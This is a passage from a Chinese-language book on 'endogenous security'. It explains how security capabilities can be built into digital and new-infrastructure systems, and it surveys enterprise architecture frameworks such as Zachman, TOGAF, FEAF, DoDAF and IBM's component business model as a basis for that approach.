自我免疫,是指安全系统必须像人体免疫系统一样,具有自适应功能,即使网络被攻破,也能保证业务安全。 网络安全与人的身体健康同理:人之所以能保持健康,是因为当病毒和细菌入侵时,免疫系统会调动各种防御力量来消灭病菌。安全系统也需要具备这样的能力,即针对一般性攻击,能够自动发现、自动修复、自我平衡;针对大型攻击,能够自动预测、自动告警和应急响应;针对极端网络灾难,能够确保关键业务不中断。 要实现自适应的安全能力,需要将信息化系统与安全系统相聚合,将信息化系统中的网、云、数据、应用、端分层解耦,以便把安全能力融入其中。为了使安全能力业务需求满足,还需要将接口、协议、数据标准化,以实现异构兼容。同时安全系统也要进行解耦,将安全能力资源化、目录化,通过标准接口进行协同。实现这种聚合后,安全能力即可融入到业务系统的各个环节中,好比业务系统内生出了一种安全能力。这种聚合联通了网络控制系统和业务控制系统,当网络检测到攻击时,业务控制系统会自动收紧安全访问控制权限;当业务检测出异常时,网络控制系统会自动采取措施来严防死守。 2.内外兼修(自主安全能力) 内外兼修,是指安全体系必须同时具有内外两种能力:“外”能及时感知威胁、发现风险;“内”能与业务系统深度融合。 一个具备免疫功能的系统,无法完全依靠外部力量建立起来。无论外部检测技术多么先进,也无法检查内部系统的问题。同样地,我们需要把安全系统和业务系统进行深度融合。如果只依靠外部的力量和安全数据,或者只有泛化的安全思维,则无法解决内部的安全问题。 要实现自主安全能力,需要将业务数据和安全数据相聚合。数据既是业务的核心,也是解决安全问题的核心。以往安全关注的是网络运行数据,但要建立自主的内生安全,还必须关注相关的业务数据。这些业务数据包括业务元数据、业务访问行为数据等。 网络安全数据,包括流量数据、终端数据、漏洞数据、系统日志等,更多地用以描述网络行为。但在攻防对抗中,攻击者都会隐藏、伪装网络行为。只有把业务数据和网络数据聚合起来,将网络威胁与业务异常结合起来进行分析,才能更准确地发现攻击者。 聚合上述两种数据,需要建立起业务与安全统一的“实体关系”数据模型,把不同的数据聚合成一个完整的安全数据视图,通过检索、AI及更广泛的知识来发现隐藏在多层关系背后的安全问题。所谓“实体”,是指客观的对象,如身份账号、IP、域名、URL、证书等;“关系”则表示对象和对象之间的联系、事件、行为。 3.自我进化(自成长安全能力) 自我进化,是指安全体系必须能够伴随着业务的成长和变化,在不断抵抗各类网络攻击的过程中,不断自我改进和自我完善。 以人体的免疫系统为例,锻炼身体、适应严酷的环境、不断对抗疾病都会提高免疫力。同样地,网络安全体系在不断抵抗攻击的过程中,也会提高防护能力。因此,我们需要安全能力伴随着业务变化日益强壮,其核心是工作人员的进步和成长,通过不断发现和解决问题,才能提高安全防护水平。 要实现自成长安全能力,需要将IT人才和安全人才相聚合。在网络安全体系中,工作人员是不可或缺的角色。在一个具体的安全业务场景中,我们既需要懂金融、工业等专业知识的IT人才,也需要具备打补丁、配置安全策略等专业能力的安全人才。只有将IT人才和安全人才聚合起来,才能使安全系统有效运转。所以,企业与组织在建设自身安全体系时,不能只考虑技术体系的IT人才建设,安全人才的投资建设也非常关键。在规划阶段,提前进行安全人才储备,将IT人才和安全人才聚合起来,是后续安全系统发展壮大的根基。 2.3 内生安全优势和价值 在数字化生产及办公环境中,内生安全的防护优势与价值非常明显。下面我们从防护目标、防护能力和防护效果三个方面进行分析和说明。 2.3.1 适应新基建和数字化的需要 从防护目标上看,内生安全可以适应新基建和数字化的需要。 这里首先来简单介绍一下新基建的概念。 1.新基建与数字化 2018年12月,中央经济工作会议在确定2019年重点工作任务时提出“加强人工智能、工业互联网、物联网等新型基础设施建设”,这是新基建首次出现在中央层面的会议中。2020年3月4日,中共中央政治局常务委员会召开会议,强调“加快5G网络、数据中心等新型基础设施建设进度”。 2020年4月20日,国家发改委在新闻发布会上首次明确了新型基础设施的范围。新型基础设施是以新发展理念为引领,以技术创新为驱动,以信息网络为基础,面向高质量发展需要,提供数字转型、智能升级、融合创新等服务的基础设施体系。 国家发改委对新型基础设施的内容给出了权威解释,主要包括以下3方面内容。 ● 信息基础设施:主要包括以5G、物联网、工业互联网为代表的通信网络基础设施;以人工智能、云计算、区块链等为代表的新技术基础设施;以数据中心、智能计算中心为代表的算力基础设施等。 ● 融合基础设施:主要指深度应用互联网、大数据、人工智能等技术,支撑传统基础设施转型升级,进而形成的融合基础设施。例如,智能交通基础设施、智慧能源基础设施等。 ● 创新基础设施:主要是指支撑科学研究、技术开发、产品研制的具有公益属性的基础设施。例如,重大科技基础设施、科教基础设施、产业技术创新基础设施等。 国家发改委还特别指出,伴随着技术革命和产业变革,新型基础设施的内涵、外延也会随之发生改变。 新基建是数字经济发展的战略基石,是数字化发展的典型代表,其核心本质是数字化。所有新基建都是围绕数字化社会的构建来规划的。新基建进一步促进了网络空间与物理空间的连通和融合。新基建的平台是否稳固、安全,是数字经济能否稳定健康发展的关键。 2.新基建的安全特点 从网络安全的角度看,新基建具有覆盖范围广、系统复杂度高、系统暴露面大、安全事故损失大等特点。 ● 覆盖范围广 无论是从技术角度、产业角度还是地域角度来看,新基建的覆盖范围都是非常广泛的,因此不可能采用“孤岛式”或“分片式”的方法对新基建系统进行安全管理,而是需要一种大范围可控的安全建设方法。 此外,由于涉及整个社会生产生活的方方面面,因此,新基建设施一旦建成并开始运行,就不太可能停止运行来进行安全检修。“修修补补”的安全方式显然不适用于新基建。 ● 系统复杂度高 新基建是新型IT技术与新型生产技术、新型业务模式相互融合的产物,其系统的复杂度与传统IT或信息化系统不可同日而语。越是复杂的系统,出现安全漏洞的频率就会越高,可能遭遇的安全风险就越大,入侵者的隐秘行迹就越难以被发现。 ● 系统暴露面大 覆盖范围广和系统复杂度高的直接结果之一是系统暴露面大幅增加。新基建系统中的任何一个节点、任何一种设备、任何一次协议交换、任何一套业务系统,都有可能成为攻击者入侵的突破口。网络防御难度呈指数级增加。 ● 安全事故损失大 在新基建时代,物理与现实的结合日趋紧密。针对物理世界的网络攻击会对现实世界造成巨大的影响和损失。事实上,正是由于新基建对数字化环境的高度依赖,使得数字化环境一旦遭遇网络攻击,就有可能造成大规模的停产停工。这不仅可能带来巨大的经济损失,甚至还有可能造成人员伤亡并引发社会混乱和灾难。 3.内生安全对新基建和数字化的意义 一方面是安全风险的成倍增加,另一方面是事故损失的影响扩大。能否为新基建搞好安全基础建设,成为部署网络安全工作的一大考验。我们必须全盘考虑新基建的网络安全建设问题,以及网络边界被打穿后的系统安全及可靠性问题。 这就要求我们必须从整个新基建系统的规划设计之初,以内生安全的建设思想为指导,充分考虑安全问题,深植网络安全能力,保持高水平安全运维,并为系统提供可升级、可扩展的安全方案,确保在各种网络安全风险环境中,都能有效地保障数据和业务安全。 2.3.2 从防护能力上,可以实现安全能力的动态成长 从防护能力上,内生安全可以实现安全能力的动态成长。 数字化时代,业务结构与业务需求的快速变化将成为企业经营的常态,这就要求信息化系统不断根据业务需求进行快速调整。同时,网络安全环境也处于瞬息万变的状态,安全策略必须能够快速适应业务变化与威胁变化。 按照传统的网络安全建设思路,网络安全的规划建设与业务系统的发展是相互独立的,面对不断变化和调整的业务系统,网络安全的滞后性和延迟性问题将不断凸显。这必然导致网络安全能力与信息化发展不匹配,结果是信息化系统建设得越多,安全漏洞就越多,发生安全事故的风险也越大。政企机构的网络安全防护能力需要与信息化系统、业务系统的建设同步成长。 只有按照内生安全的建设思想,将业务系统与安全系统深度聚合,IT人员与安全人员深度聚合,实现安全能力与业务能力的同步增长和动态增长,才能实现可持续的安全能力。 业务系统与安全系统深度聚合可以有效解决安全与业务相互独立的问题,实现安全能力与业务系统的深度融合,实现对业务系统的安全防护需求的动态响应。 IT人员与安全人员的深度聚合可以提升系统本身的安全性,最大限度地减少安全漏洞和由此带来的安全风险,改变“系统越多,漏洞越多,风险越大”的传统局面,做到在源头降低安全风险。 2.3.3 最大限度降低安全风险和损失 从防护效果上看,内生安全可以最大限度地降低安全风险和损失。 传统网络安全防护重建设,轻运营;重预防,轻响应;重安全设备采购,轻安全能力建设;重外部威胁,轻内部风险;重系统风险,轻业务风险。 在网络攻击手段日益复杂、系统漏洞层出不穷、内部风险和业务风险日益突出的背景下,传统的安全理念和防护手段无法真正降低安全风险和减少损失。结果导致有些时候,为了防护某些损害不大的风险,却付出了高昂的防护代价;有些时候,某些看似偶然的风险,却造成了极大的损失,如停工停产、业务中断、数据被破坏等。传统网络安全工作能够为政企机构实现怎样的安全保障,防护价值如何,往往都是不确定的。 只有在内生安全理念的指导下,通过系统化的安全建设,层层设防,步步为营,才能最终保障将安全风险的损失降到最低。将安全与业务紧密结合,有力保障数据和业务安全,这也是内生安全防护的终极目标。 以内生安全思想为指导的安全体系建设,网络安全工作可以贯彻到规划、开发和运营的全过程;通过细致的运营,融合业务数据与安全数据,能够更加敏锐智能地发现各种安全威胁;通过最大程度发挥检测与响应的价值,能够更加及时地阻止和消除网络入侵行为,将安全风险和损失降至最低。 2.4 三大关键落地内生安全 网络安全是高度对抗性的行业,网络安全系统包括技术、数据、人员和体制机制等,是一个复杂的系统。为了保障业务的安全性,实现系统的有效运转,不能仅仅考虑产品和技术因素,而是要综合考虑技术、管理、运行等多方面的因素。 2.4.1 安全的关键是管理 首先,漏洞是不可避免的,只要系统0day漏洞还没有被黑客穷尽,就永远面临着未知威胁。这个漏洞可能存在于芯片、操作系统、应用系统、网络设备等任何地方,随时可能导致数据被盗,也有可能会直接导致系统崩溃。如果只采用攻防技术来防护,这类安全问题是永远无法解决的。其次,绝大部分威胁是由内部各种非法和违规的操作行为造成的。根据FBI和CIA等机构联合进行的一项安全调查报告显示,超过85%的网络安全威胁来自于内部,危害程度远远超过黑客攻击和病毒造成的损失。最后,所有的体系都是人为操控管理的,但人本身的弱点造成了网络体系最大的脆弱性。上述问题的存在,决定了不管技术多先进,我们的体系最终会失效。 安全的关键是管理。这里的管理不是传统意义上的管理,它既不是单纯的人员管理、行政管理、体制机制管理,也不是传统的条文式管理、流程式管理,而是一套“新管理”模式。它由数据驱动,通过与安全体系中的能力平台和服务平台有效对接,实现对安全技术、安全运行等各方面要素的有效管理,从而发现和规避黑客利用安全体系中的漏洞发起的攻击,克服人的不可靠性,弥补人的能力不足。 这种新管理模式的表现形式,可以是网络安全管理平台,也可以是网络安全管理运营中心。内生安全,代表的正是这种新形态的网络安全管理模式。它采用“一个中心、五个滤网”模式,从网络、数据、应用、行为、身份五个层面来有效实现对网络安全体系的管理,从而构建无处不在、处处结合、实战化运行的安全能力体系。这种新管理模式,需要有强大的能力体系支撑,需要采用工程化、体系化的方式进行实施,这套方法的成果构成了内生安全框架。 2.4.2 管理的关键是框架 实现内生安全是一套复杂的系统工程,需要采用工程化、体系化的方式实施,实现它的关键就是安全框架。内生安全框架有3个重点:“厘清楚”“建起来”“跑得赢”,目的是通过“新管理”,使网络安全体系具有动态防御、主动防御、纵深防御、精准防护、整体防护、联防联控的能力。 实现内生安全所代表的这种新形态的网络安全管理是一套复杂的系统工程,它需要一个新形态的能力体系作为支撑,需要采用工程化、体系化的方式来实施,其实现关键是安全框架。 在信息化系统的功能越来越多、规模越来越大、与用户的交互越来越深的情况下,即使是最先进的单一的、堆叠的安全产品和服务,也无法保证不被黑客穿透,但内生安全系统能够使安全产品和服务相互联系、相互作用,在整体上具备单个产品和服务缺失的功能,从而保障复杂系统的安全。建设内生安全采用的就是系统工程的思想。 内生安全框架是从工程实现的角度,针对我国的国情研制出来的,它将安全需求分步实施,逐步建立面向未来的安全体系。该框架从顶层视角出发,支撑各行业的建设模式从“局部整改外挂式”走向“深度融合体系化”,在数字化环境内部建立无处不在的网络安全“免疫力”,真正实现内生安全。 内生安全体系建设,需要先体系化地梳理、设计保障政府和企业数字化业务所需要的安全能力,才能确保这些安全能力能够融入到信息化与业务系统中去。在设计的过程中,我们要根据政府和企业自身信息化项目的实际情况,对安全能力进行挑选、组合和规划,制定明确标准。 融合是建设的关键,将安全能力深度融入物理、网络、系统、应用、数据与用户等各个层次,确保深度结合;还要将安全能力全面覆盖云、终端、服务器、通信链路、网络设备、安全设备、工控、人员等要素,避免局部盲区,实现全面覆盖。这种将安全能力合理地分配到正确位置的建设过程,就是安全能力组件化的过程。 在具体的建设过程中,需要一个全景化的技术部署模型,全面描绘政企机构的整体网络结构、信息化和网络安全的融合关系,以及安全能力的部署形态。在这个基础上,我们就可以把所有的安全能力组件分别以系统、服务、软硬件资源的形态,合理部署到信息化系统的不同区域、节点、层级中。 内生安全体系强调安全运行,把管理作为关键,就能“人定胜天”,跑得赢漏洞,跑得赢内鬼,跑得赢黑客。 2.4.3 框架的关键是组件化 从安全系统与信息化系统聚合的实施角度来看,如果割裂地对老系统采用老办法,新系统采用新办法,当老系统将来被替代时,安全系统也不得不替换掉,从而造成巨大的浪费。这就要求对安全体系进行“统一设计,分步实施”,在体系的基础上,将安全框架组件化,使这些组件作为新体系的一部分部署到老系统中,从而适应信息化系统这种渐进式的、“立新破旧”的过程,避免不断地重建安全系统,并确保现在安全系统的投资是面向未来的。 从国际经验看,ISO/IEC 27000信息安全管理体系是按照组件化的方式设计的,包含14个类别、35个目标、114个控制措施。遵循这样的经验,采用工程化的思想,将体系中的安全能力映射成为可执行、可建设的网络安全能力组件,构成内生安全框架,然后将这些组件与信息化进行体系化的聚合,是安全框架落地的关键。 为了穷尽安全能力组件的类型,我们研究了针对党、政、军、央企、金融等大型机构网络安全的新技术产品和服务体系,为这些体系设计并解构出了十个网络安全工程,以及五方面的支撑能力任务,亦称“十大工程、五大任务”,简称“十工五任”。 “十工五任”是内生安全框架的具体落地手册,具备一个复杂庞大的信息化系统所需要的全部安全能力。这相当于打造了一个信息化巨系统内生安全框架的建设样板,每一个工程和任务,都可以理解成样板房里的不同“房间”。政企机构可以结合自身信息化的特点,选取不同的“房间”进行组合,定义自己的关键工程和任务。 第3章 内生安全建设的方法论基础 3.1 EA方法论简述 过去20年,无论国内还是国外,EA(Enterprise Architecture,企业架构)方法论在引导与推动大规模、体系化、高效整合的信息化建设,支撑各行各业科学地展开业务运营等方面起到了至关重要的作用。事实上,EA方法论不仅指导了信息化建设,在组织架构、国防建设等方面也起到了重要作用。本书提到的内生安全思想及其指引下的“新一代网络安全框架”的很多思路也来源于EA方法论。 什么是EA?我们为什么需要EA?这个诞生于30年前的方法论为何至今仍然在解决IT系统性问题中发挥着举足轻重的作用?我们在将EA方法论借鉴应用到网络安全时,哪些思想可以实际应用,哪些思想只是作为参考开阔思路,而不适合在我国的网络安全领域具体落地?本节将对这些问题进行系统性的探讨。 3.1.1 EA的定义 EA是通过创建、沟通和提高用以描述企业未来状态和发展的关键原则,进而将商业愿景和战略转化成有效的企业变更的过程。EA方法主要用于演进或维护现存的信息技术体系,或是引入新的信息技术体系,以实现组织的战略目标和信息资源管理目标。 EA的重要目的是将跨组织的、零散的遗留流程(人工或自动)优化进一个集成的环境,使其可以及时响应变更,并有效地支持业务战略的交付。如果说企业是具有一系列共同目标的组织的集合,那么EA则是为了有效地实现这一目标,去定义企业的结构和运作模式的概念蓝图;是构成企业的所有关键元素及其关系的综合描述;是通过创建、沟通和优化用以描述企业未来状态和发展的关键原则和模型,将商业愿景和战略转化成有效的企业变更的过程。如果将日益复杂的数字化环境看作一个复杂的系统,EA其实就是系统工程在信息化领域的结合应用。 EA是承接企业业务战略与IT战略之间的桥梁与标准接口,是企业信息化规划的核心。对于持续变更的业务环境,IT系统也需要随之演进,而EA则能为响应这种演进提供战略背景支撑。EA是企业顶层设计的图纸,决定企业结构、组成部分、各部功能、空间关系等元素。 一般而言,EA可以分为两大部分:业务架构和IT架构。目前大部分EA方法都是从IT架构发展而来的。 ● 业务架构:是把企业的业务战略转化为日常运作的渠道。业务战略决定业务架构,包括业务的运营模式、流程体系、组织结构、地域分布等内容。 ● IT架构:是指导IT投资和设计决策的IT框架,是建立企业信息系统的综合蓝图,包括数据架构、应用架构和技术架构三部分。 其中,业务架构的重点是流程和数据,而IT架构的重点是应用和技术。前者增加了商业愿景和任务目标驱动力,后者增加了可落地的实施策略和计划。 3.1.2 EA的诞生与演变 1987年,美国人John Zachman在其发表的A Framework for Information Systems Architecture论文中首次提出了“信息系统架构框架”的概念,由此奠定了EA的理论基础。 John Zachman在论文中指出,为了避免企业在日益复杂的业务中分崩离析,信息系统架构已经不再是一个可有可无的选择,而是企业的必需。论文从信息、流程、网络、人员、时间、基本原理等6个透视角度来分析信息系统架构;同时提供了与这些视角相对应的6个模型,包括语义、概念、逻辑、物理、构件和功能模型。由于其杰出的开创性工作成果,John Zachman被公认为是EA领域的开拓者。 1996年,美国的Clinger-Cohen法案(也称为“信息技术管理改革法案”)中首次确定了术语“IT架构”。该法案的主旨是美国政府应指导下属联邦政府机构通过建立综合方法来管理信息技术的引入、使用和处置等。Clinger-Cohen法案要求政府机构的CIO负责开发、维护一个合理的、集成的IT架构(ITA),并帮助实施。当时的术语ITA被解释为ITEA(IT与EA的组合,即企业IT架构)。 由于该法案的实施,美国的一些政府机构率先开始使用EA,这对EA的应用推动发挥了非常重要的作用。美国国家标准与技术研究院(National Institute of Standards and Technology,NIST)于1989年发布企业架构模型(NIST EA Model),于1999年发布联邦企业架构框架(Federal Enterprise Architecture Framework,FEAF),于2003年发布国防部体系架构框架(Department of Defense Architecture Framework,DoDAF)。同时,在企业机构和一些标准化组织中,也涌现出一些具有影响力的框架,例如TOGAF(The Open Group Architecture Framework,开放标准组织体系结构框架)。还有IBM使用的CBM(Component Business Model,组件化业务模型),美国情报体系使用的JARM(Joint Architecture Reference Model,联合架构参考模型),这些都是业界实践后抽取出来的标准方法论。另外,微软、Gartner也都对EA有相应的理解。 在实际的落地应用中,Zachman的基础框架已经较少使用;而TOGAF更多以成果为目的,整个体系过于复杂;DoDAF的应用场景与我国的现实情况有较大的不同;JARM引入了值得借鉴的层次模型来表述能力体系;而CBM则注重可用于实践的能力体系;EA3 Cube框架也给出了多维度视角。这些典型的方法与框架,将在3.1.4节与3.1.5节进行概要性的阐述,以帮助我们更好地理解EA的方法论思路,并考虑如何借鉴应用到网络安全领域。 3.1.3 EA的作用 很多企业在进行信息化建设时,常常以技术为主导,仅将关注点放在当前问题的IT实现上,缺乏全局思考,经常与业务脱节。这往往会导致上线的新系统无法对业务提供有效支持,无法适应业务快速变化的需求;各系统间无法形成有效联动;也存在功能重复建设的情况。简单来说,就是管理层、IT人员和业务人员之间没有进行充分沟通并达成共识。 在数字化时代,“业务即IT,IT即业务”。我们已经不可能割裂地来看待业务与IT。在外部环境迅速变化、内部环境日益复杂的情况下,一个完备而科学的EA就显得极为重要,它可以在利益相关者之间、信息系统之间、人与系统之间搭建无障碍的沟通桥梁,保障各方拥有共同的理解与愿景。 因此,通过IT对信息进行有效的利用及管理,是业务成功的关键因素,也是获取竞争优势不可缺少的手段,可以借此实现下述目的。 ● 更高效率的IT运行:具体包括降低软件开发、支持和维护的成本;增强应用的可移植性;提高互操作性和简化系统与网络管理;简化系统构件的替换与升级。 ● 更好的投资收益,更低的投资风险:具体包括降低IT基础设施的复杂度;最大化IT基础设施投资回报率;增加开发、购买和外包IT解决方案的弹性;降低新投资以及IT成本风险。 ● 更快、更简单和更便宜的采购:具体包括扩大采购行为的信息可控性;最大化采购速度和灵活性,维持架构一致性;增强供应商开放系统的能力。 3.1.4 典型的EA框架 1.Zachman框架 Zachmam框架的全称是企业架构和信息系统架构Zachman框架(Zachman Framework for Enterprise Architecture and Information Systems Architecture)。 Zachman框架是一种逻辑结构(见图3.1),模型分为两个维度。 ● 横向维度采用6W(What、How、Where、Who、When、Why)进行组织,分别为什么(数据)、如何(功能)、哪里(网络)、谁(人员)、何时(时间)、为什么(动机)。 ● 纵向维度反映了IT架构层次,分别为范围(规划人员)、企业模型(系统所有人员)、系统模型(体系结构设计人员)、技术模型(构建人员)、详细模型(集成人员)、功能模型(用户)。 横向结合6W,Zachman框架分别由数据、功能、网络、人员、时间、动机分别对应回答What、How、Where、Who、When与Why这6个问题。 图3.1 Zachman框架模型3.0 纵向按企业中不同角色的关注点进行划分。 ● 规划人员关注范围模型,能够看到企业的发展方向、业务宗旨和系统边界范围。 ● 系统所有人员关注企业模型,能够使用企业术语定义企业的本质,看到的是企业的结构、处理、组织等。 ● 体系结构设计人员关注系统模型,能够使用更严格的术语定义企业业务,看到的是每项业务处理所要完成的功能。 ● 构建人员关注技术模型,使用技术模型来解决企业业务的信息处理需求。 ● 集成人员关注详细模型,需要解决与特定语言、数据库存储表格及网络状况等相关的具体问题。 ● 用户关注功能模型,也是系统的最终用户,考虑系统能否支持自身的工作。 从这两个维度将所有IT构件进行分割,可以划分成相对独立的模块,以便于独立管理,如图3.2所示。 图3.2 拓展的Zachman模型 采用Zachman框架进行IT规划的一般步骤如下。 步骤1.确定组织的愿景和原则。 ● 确定IT架构业务、组织与IT系统范围,识别业务驱动力。 ● 确定IT架构愿景和目标。 ● 制定IT架构定义的原则。 ● 识别IT架构相关需求。 ● 研究与学习业界IT架构最佳实践。 步骤2.现状描述分析。 ● 搜集现有IT系统的现状资料。 ● 业务现状分析,识别现有IT系统在业务支撑方面存在的问题。 步骤3.目标机构定义。 ● 引入最佳实践,并结合企业实际,定义目标IT架构,包括数据、应用、基础设施架构。 步骤4.差距与改进点分析。 ● 目标架构与现状的差距与改进点分析。 ● 将具体IT需求纳入目标架构框架。 步骤5.改进点优先级排序。 ● 对IT架构的改进点以及具体需求进行优先级排序。 步骤6.制定IT架构的实施计划。 ● 确定向目标IT架构迁移的具体实施计划。 ● 确定目标IT架构实施的推行组织。 步骤7.持续改进IT架构规划过程,各个环节不断优化。 ● 制定目标IT架构的持续改进计划。 ● 制定IT架构的管理维护机制。 从1987年至今,EA发展了30余年,许多专家与组织都试图对EA的内涵进行定义,国际上也涌现出一批企业架构方法论。其中,影响力比较大的有TOGAF、FEAF和DoDAF。 TOGAF是联盟性组织The Open Group主导开发的框架,在企业信息化建设中起着举足轻重的作用;FEAF是指导美国联邦政府组织结构和管理的框架,在美国联邦政府的管理与组织中扮演了重要角色;DoDAF作为美国国防部指导开发的框架,在国防信息化建设中发挥了重要作用。 2.TOGAF TOGAF全称为The Open Group Architecture Framework,是由致力于技术标准制定和推广的非营利组织The Open Group制定的用于开发EA的方法,是目前具备影响力的主流EA框架之一,主要应用于企业。TOGAF是一种协助开发、验收、运行、使用和维护架构的工具。在福布斯排名前50的公司中,有80%的公司采用了TOGAF框架。 TOGAF更接近于一个常用的标准EA描述,提供了架构开发方法、架构能力框架、架构内容框架、企业连续体及参考模型等一系列组件。 TOGAF是The Open Group中的“体系结构框架组”成员共同开发制定的。该小组的会员包含全球领先的IT客户及厂商,基本上代表了架构发展的最佳实践。使用TOGAF作为架构框架,可以实现架构开发的一致性,反映利益相关者的需要,并为当前需求以及未来可能的业务需求提供应有的考虑。 在国际上,TOGAF已经被证实可以灵活、高效地构建企业IT架构。TOGAF在国内的引进已对国内IT产业产生了重要影响。2009年之前,国内IT企业很少参与国际标准的制定,致使国内企业的IT建设与欧美企业之间有较大差距。引进TOGAF后,国内企业的IT技术架构基本与国外先进的技术架构保持同步。TOGAF帮助国内企业节约了成本,增加了业务模式的灵活性,加强了个性化和随需应变的能力;同时提高了信息系统的应用水平,还对企业的业务模式创新起到了一定的推动作用。 3.FEAF FEAF(Federal Enterprise Architecture Framework,联邦企业架构框架)是从美国国家标准与技术研究院EA模型(NIST EA Model)的基础上扩展而来的,以使其满足美国联邦政府治下机构及企业架构的组织和管理需求。在实际应用中,FEAF更多地用于指导美国联邦政府组织的结构和管理的框架设计。 FEAF提供了一个组织结构和收集渠道,方便成员将各自的架构集中到企业架构中去。该框架是非限制性的,适用于所有的联邦内机构,特别是已存在架构的机构。如今,FEAF已经发展出了许多更先进的模型。FEAF可以看作一个基础框架,为EA的建设提供了一整套开发方法。 FEAF的架构共分为4个层次。 ● 第一层次是FEAF的最高层次,它介绍了开发和维护联邦企业架构所需的8个组成部分。 ▷ 架构推动者(Architecture Driver) ▷ 战略方向(Strategic Direction) ▷ 当前架构(Current Architecture) ▷ 目标架构(Target Architecture) ▷ 转换过程(Transitional Process) ▷ 架构片段(Architectural Segment) ▷ 架构模型(Architectural Model) ▷ 标准(Standard) ● 第二层次将架构驱动力、当前架构、目标架构以及架构模型的内容,从业务和设计两方面进行了细化。第二层次更详细地说明了由当前架构到目标架构的转换过程(例如构型管理和工程转变控制)的参照标准。标准包括用于促进互用性的强制性标准,以及自愿指导方针和最佳做法。 ● 第三层次在第二层次的基础上,将当前设计架构与目标设计架构细化为数据架构、应用架构和技术架构。转换过程的内容也被进一步细化和明确。 ● 第四层次通过借鉴EA规划技术,为业务架构模型的建立提供了方法,从不同的角色视角与六个方面(What、How、Where、Who、When、Why)出发,完整描述出EA应包含哪些内容。 4.DoDAF DoDAF(Department of Defense Architecture Framework)是由美国国防部的工作小组制定的系统架构框架,于1996年6月推出,主要用于指导国防信息化建设。DoDAF的前身是“指挥、控制、通信、计算机、智能、监视和侦察”(Command, Control, Communications, Computers, Intelligence, Surveillance and Reconnaissance)架构框架。 DoDAF演变至今已经具有以下一些特点: ● 体系结构开发过程从以产品为中心转向以数据为中心,主要为决策提供数据; ● 从初期的三大视图(作战视图、技术视图和系统视图)更新到现有的8种视图,分别是全视图、数据与信息视图、标准视图、能力视图、作战视图、服务视图、系统视图和项目视图; ● 描述了数据共享和在联邦环境中获取信息的需求; ● 定义和描述了国防部企业架构; ● 明确和描述了与联邦企业架构的关系; ● 创建了国防部架构框架元模型; ● 描述和讨论了面向服务架构(Service-Oriented Architecture)开发的方法。 3.1.5 组件化业务模型 CBM(Component Business Model,组件化业务模型)是IBM开发的业务模型组件化的方法,通过将组织活动重新分组到数量可管理的离散化、模块化和可重用的业务组件中,帮助企业实现有组织的提供服务的能力,实现内部、外部的专业化。该模型可以帮助企业在扩张和发展的同时,在不增加其复杂性的前提下,降低风险,提高效率。 1.业务组件 业务组件是CBM的核心概念,是构建专业化企业的功能模块,每个组件包含5个维度,如图3.3所示。 图3.3 业务组件的5个维度 ● 业务用途(business purpose):组件的业务用途是其在组织内部存在的意义,表现为该组件向其他组件提供的价值。 ● 活动(activity):为了实现业务用途,每个组件都要执行一系列相互独立的活动。 ● 资源(resource):组件需要各种资源(如人员、知识、资产等)来支持这些活动。 ● 治理模式(governance model):每个组件都要根据自己的治理模式,以相对独立的方式进行管理。 ● 业务服务:每个业务组件都可以提供和接收业务服务。 业务组件的优势之一来自组件之间通过松散耦合方式进行链接,具备灵活、快速响应、适应性强的特点,另外一个优势是组件内各活动的凝聚力强,可对外提供高效率、高质量的服务。 2.CBM模型 CBM模型通过两个维度对组件进行组织,分别是业务能力和责任级别。如图3.4所示。 图3.4 CBM模型示意图 业务能力即企业创造价值的能力。通过明确不同部门的业务功能、划分边界来确定关系,确保所有工作都在进行,而且不会进行重复的工作。不同行业不同公司建立的模型会有所不同,但都是按照业务能力、工作来划分组件,并按照特定的顺序进行排序。 责任级别分为战略决策(引导)、管理检查(控制)、业务行动(执行)。战略决策(引导)主要向其他业务组件提供战略、总体方向和公司政策,聚焦于明确战略的发展方向,建立总体的方针政策,调配资源,管理和指导各个业务板块。管理检查(控制)主要指企业的管理活动,如监控、管理特殊情况和战术决策等业务,负责把战略落实到运营过程中,并监控和管理业务指标与企业员工,发挥监管资产和信息的作用。业务行动(执行)是指通过具体的业务执行来实现的业务功能,处理业务请求和业务数据,注重作业效率和处理能力,处理各种资产和信息。 3.CBM如何设计 CBM通过设计组织的未来形式,推动企业内部和外部向专业化发展。该过程包括以下3个方面: ● 通过分析业务和市场环境,得到现有公司的业务组件整体视图; ● 在不断变化的环境中,按照迁移规划方案向专业化发展; ● 促使组织、基础设施向组件化的企业方向不断优化。 3.2 内生安全思想与EA方法论 内生安全是信息化与网络安全发展的内在要求,是解决复杂体系网络安全问题的必由之路,但实现内生安全需要有实践基础上的方法论的指引。 EA方法论是指导政企机构信息化建设行之有效的方法论,非常值得日益复杂的网络安全领域进行借鉴。尽管EA的各类实现框架并不能简单地套用在网络安全的规划建设上,很多也不能完全适应本土化的网络安全建设环境,但其核心思想和方法体系却可以为我们实现内生安全思想指引下的新一代网络安全框架的设计提供有力的支撑和借鉴。 3.2.1 采用系统性框架指引网络安全建设 作为系统工程思想在信息化领域的应用,EA方法要求我们打破零散式的规划与建设,系统性地构建信息化体系,从而引导与推动大规模、体系化、高效整合的信息化建设。但是与信息化发展不同的是,网络安全行业一直缺乏与信息化系统工程方法相匹配的框架,来指导未来的网络安全体系建设。尤其在数字化转型不断深入的过程中,需要有一套行之有效的以系统工程方法论结合“内生安全”理念而形成的网络安全规划建设框架,引导政企等大型机构规划和建设网络安全。 我们要做的是从EA的方法体系与各种框架中找到适合中国网络安全状况的方法,并结合我国的实际国情,加以开发与利用,以及结合内生安全理念,形成适用于网络安全的框架、方法、配套工具等。这里也需要特别说明,传统的EA框架中也包含网络安全的内容,但这里的网络安全更多是提出了安全需求,而不是体系化地阐述如何去进行网络安全的能力建设,这与我们的目的是有区别的。 在这项工作中,我们在使用EA方法论时,需要清晰地理解其真正的目的是为了帮助政企等大型机构厘清并实现其所需要具备的网络安全能力体系,而不是为了建设某种系统。政企机构所需要具备的网络安全能力体系是什么、包含什么,以及应该如何有序地进行构建并真正运行起来才是关键。平台、系统等只是实现这个能力体系的具体措施。 一些非常有益的借鉴思路与方法如下。 ● 汲取IBM CBM方法中的能力组件思路,能够帮助我们确定在一个大型机构的业务与信息化环境中,或者更广阔的网络空间中,网络安全需要形成多少种能力,这些能力应该在哪里建设,以及如何有序地建设,才能够形成该机构所需要的完整的全局的网络安全能力体系。而在国内政企机构所需要的网络安全能力体系上,滑动标尺模型(参见3.2.2节)则给出了很好的思路。 ● 汲取EA3 Cube架构中的多视角思维,结合我国大型机构的实际需求,从“技术、管理、运行”多方面视角来对网络安全的能力覆盖进行展开。 ● 